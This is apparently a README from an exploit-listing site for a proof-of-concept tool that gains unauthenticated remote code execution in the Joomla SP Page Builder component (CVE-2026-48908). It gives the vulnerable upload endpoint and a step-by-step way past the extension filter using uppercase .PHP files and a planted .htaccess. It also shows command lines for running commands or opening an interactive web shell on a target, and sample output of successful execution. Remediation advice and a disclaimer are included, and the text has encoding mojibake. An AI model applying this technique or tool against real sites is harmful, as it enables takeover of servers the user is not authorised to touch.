## https://sploitus.com/exploit?id=2163AC16-50F0-521D-A68D-3A43CB77CA53
# CVE-2026-48908 โ SP Page Builder (Joomla) Unauthenticated RCE
Proof-of-concept exploit for **CVE-2026-48908**, a critical (**CVSS 4.0 = 10.0**) unauthenticated
remote-code-execution vulnerability in the **SP Page Builder** component (`com_sppagebuilder`) for
Joomla, by JoomShaper.
| | |
|---|---|
| **CVE** | CVE-2026-48908 |
| **Weakness** | CWE-284 Improper Access Control โ Unauthenticated Arbitrary File Upload โ RCE |
| **Component** | SP Page Builder (`com_sppagebuilder`) for Joomla |
| **Affected** | **1.0.0 โ 6.6.1** |
| **Fixed in** | **6.6.2** |
| **Privileges required** | None (pre-authentication) |
| **User interaction** | None |
## Description
SP Page Builder exposes the controller task **`asset.uploadCustomIcon`** to handle uploading a
custom icon-font package:
```
index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon
```
In affected versions this task is reachable **without authentication and without a valid anti-CSRF
token**. It accepts a ZIP archive (multipart field `custom_icon`) and **extracts its contents into a
publicly web-served directory** under the document root:
```
/media/com_sppagebuilder/assets/iconfont// (including the fonts/ subfolder)
```
Because the upload is reachable pre-auth and the extracted files land in the web root, an attacker
can write attacker-controlled files to a browsable location and reach them over HTTP.
### Achieving code execution despite the extension filter
Some builds add a server-side filename filter on the archive entries. This PoC defeats a common
implementation of it with a three-step chain:
1. **Case-sensitive blocklist.** The filter rejects lowercase `.php`, `.phtml`, `.phar`,
`.php3`โ`.php8`, `.pht`, `.inc`, โฆ but it does **not** normalise case, so **`.PHP`** (and other
mixed-case variants) and **`.htaccess`** pass through.
2. **Case-sensitive web-server handler.** A default Apache PHP handler (``)
only executes lowercase `.php`, so an uploaded `.PHP` is initially served as source text, not run.
3. **`.htaccess` override.** A `.htaccess` (which the blocklist also misses) containing
`AddType application/x-httpd-php .PHP` is dropped alongside the payload. Where `AllowOverride`
permits it, this registers `.PHP` as PHP and the uploaded shell **executes**.
The PoC always packages a valid icon-font structure (`selection.json`, `style.css`,
`fonts/.ttf`) so the upload is accepted, then adds the shell.
**Adaptive โ it walks a list of php-executable extensions (least footprint first), then a
`.htaccess` fallback, and stops at the first that actually runs code:**
1. **Direct single-file uploads** โ `fonts/.` for each of
`php, php3, php4, php5, php7, pht, phtml, phar, PHP, pHp, Php`. **No `.htaccess`.**
Different SP Page Builder filters block different sets, and different Apache configs execute
different extensions โ so this finds whatever combination the target allows *and* runs.
2. **`fonts/.htaccess` + `fonts/.PHP` (fallback)** โ only if every direct attempt fails.
The dropped `.htaccess` (`AddType โฆ .PHP`) forces an uppercase `.PHP` to execute where
`AllowOverride` permits it (this is what 5.4.6-style hosts need).
It **stops at the first method that executes** and prints which one landed. Every accepted upload is
tracked, so `--cleanup` removes **all** of them (multiple tries can leave write-only dirs).
> Depending on version and server hardening the result varies, and the PoC states it explicitly
> (see **Outcomes** below): full RCE, file-write-only (PHP disabled / `AllowOverride None`),
> patched (admin-only), or not vulnerable.
## Requirements
```bash
pip install -r requirements.txt # requests
```
## Usage
```bash
# confirm the vulnerability and prove code execution (runs `id`)
python3 sppb_rce.py https://target.example
# run a specific command
python3 sppb_rce.py --url target.example -c "uname -a"
# interactive pseudo-shell
python3 sppb_rce.py https://target.example --shell
# only check; run no command
python3 sppb_rce.py https://target.example --check
# remove the uploaded payload directory afterwards
python3 sppb_rce.py https://target.example --cleanup
```
The target may be given as a positional argument or via `--url`, with or without a scheme.
### Example (sanitised)
```
[*] target : https://target.example
[*] endpoint : index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon
[*] try .php -> rejected by filter
[*] try .php3 -> rejected by filter
...
[*] try .PHP -> uploaded, not executed
[*] try .htaccess+.PHP -> EXECUTED
[+] CODE EXECUTION CONFIRMED via '.htaccess+.PHP' (echo 7*6 -> 42)
[*] running: id
------------------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------
[*] cleanup: done (4 dirs)
```
### Outcomes (and exit codes)
The PoC always tells you the verdict for the target:
| Output | Meaning | Exit |
|---|---|---|
| `CODE EXECUTION CONFIRMED via ''` | **Vulnerable โ full unauth RCE** | 0 |
| `[~] PARTIALLY VULNERABLE โ unauth file-write works, but PHP did NOT execute` | File-write only (`AllowOverride None` / PHP disabled in `/media`) | 3 |
| `[-] TARGET NOT VULNERABLE โ SP Page Builder is patched (6.6.2+)` | Patched โ upload now requires admin auth | 1 |
| `[-] TARGET NOT VULNERABLE โ every upload was rejected, or SP Page Builder is absent/patched` | Not exploitable / component not present | 2 |
### Safety features
- The dropped web shell is **guarded by a random per-run token** and returns `404` to anyone without
it โ it is not a world-open backdoor.
- `--cleanup` deletes the payload directory it created.
- Default actions are benign (`id`, an arithmetic marker).
## Remediation
1. **Upgrade SP Page Builder to 6.6.2 or later** (adds authentication, authorization and CSRF checks
to the upload task). This is the primary fix.
2. Defense-in-depth on the web server:
- Disable PHP execution in upload directories (`/media/`, `/images/`, `/tmp`) via the FPM pool or
`php_admin_flag engine off`.
- Set `AllowOverride None` on those directories so a dropped `.htaccess` cannot re-enable handlers.
- Use a case-insensitive **allow-list** for upload extensions, never a blocklist.
3. Assume-breach review: look for unexpected `.php`/`.PHP` under `media/.../iconfont/`, new Super User
accounts, and planted file managers.
## References
- NVD โ [CVE-2026-48908](https://nvd.nist.gov/vuln/detail/CVE-2026-48908)
- CVE.org record โ [CVE-2026-48908](https://vulners.com/cve/CVE-2026-48908)
- Technical write-up โ [SP Page Builder uploadCustomIcon RCE (mySites.guru)](https://mysites.guru/blog/sp-page-builder-zero-day-uploadcustomicon-rce/)
- Vendor โ [JoomShaper SP Page Builder](https://www.joomshaper.com/page-builder) (security fix in 6.6.2)
- [SP Page Builder โ Joomla Extensions Directory](https://extensions.joomla.org/extension/sp-page-builder/)
## Keywords
Joomla SP Page Builder exploit ยท com_sppagebuilder unauthenticated RCE ยท CVE-2026-48908 PoC ยท
asset.uploadCustomIcon arbitrary file upload ยท Joomla remote code execution ยท pentest exploit script.
## DISCLAIMER
This software is published for **educational purposes and authorized security testing only** โ
e.g. penetration tests you have **written permission** to perform, bug-bounty programs that include
the target in scope, CTF competitions, and your own lab systems.
Accessing, modifying, or disrupting computer systems without authorization is **illegal** in most
jurisdictions. **You are solely and entirely responsible for your own actions.** By using,
downloading, or distributing this code you agree that:
- you will use it only against systems you **own** or have **explicit, documented permission** to test;
- the author(s) and contributors accept **no liability** for any damage, data loss, service
disruption, or legal consequences arising from use or misuse of this code;
- this material is provided **"AS IS", without warranty of any kind**, express or implied.
If you do not agree with these terms, do not use this software. As with any publicly available
exploit/PoC, it is shared in good faith to help defenders detect, understand and remediate the
vulnerability; what you do with it is on you.
## License
MIT โ see [LICENSE](LICENSE).